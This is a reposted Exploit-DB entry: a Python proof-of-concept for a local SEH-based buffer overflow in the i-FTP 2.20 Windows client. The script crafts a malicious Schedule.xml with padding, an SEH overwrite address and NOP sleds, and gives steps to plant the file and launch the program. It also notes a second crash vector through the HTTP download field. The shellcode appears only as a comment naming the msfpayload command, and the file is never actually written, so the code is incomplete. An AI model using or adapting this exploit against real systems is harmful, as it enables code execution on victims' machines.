i-FTP 2.20 – Local Buffer Overflow (SEH)

  • 作者: metacom
    日期: 2014-11-06
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/35177/
  • #!/usr/bin/python
    #Exploit Title:i-FTP Buffer Overflow SEH
    #Software Link:www.memecode.com/data/iftp-win32-v220.exe
    #Version:i.Ftp v2.20 (Win32 Release)
    #Vulnerability discovered:26.10.2014
    #Description:Simple portable cross platform FTP/SFTP/HTTP client.
    #Tested on:Win7 32bit EN-Ultimate - Win8.1-DE 64bit - Win XPsp3-EN
    #Exploit Author:metacom--> twitter.com/m3tac0m
    import struct
    def little_endian(address):
    return struct.pack("<L",address)
    poc ="\x41" * 591
    poc+=little_endian(0x1004C31F)#1004C31F 5E POP ESI
    poc+="\x90" * 80
    # msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R 
    #| msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x20\x22" -t c
    poc+="\x90" * (20000 - len(poc))
    header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
    header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
    header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc 
    footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
    exploit =header + footer
    filename = "Schedule.xml"
    file = open(filename , "w")
    print "\n[*]Vulnerable Created Schedule.xml!"
    print "[*]Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp"
    print "[*]Start IFTP"
    print "[*]----------------------------------------------------"
    print '''
    [+]Second Vulnerability
    [-]You can also enter the contents 20000 A of the file in the -->
     * HTTP -> HTTP Download --> Option "FILE" to cause this crash
     * Access violation - code c0000005 (!!! second chance !!!)
     * 0:003> !exchain
     * 016fff2c: 41414141
     * Invalid exception stack at 41414141'''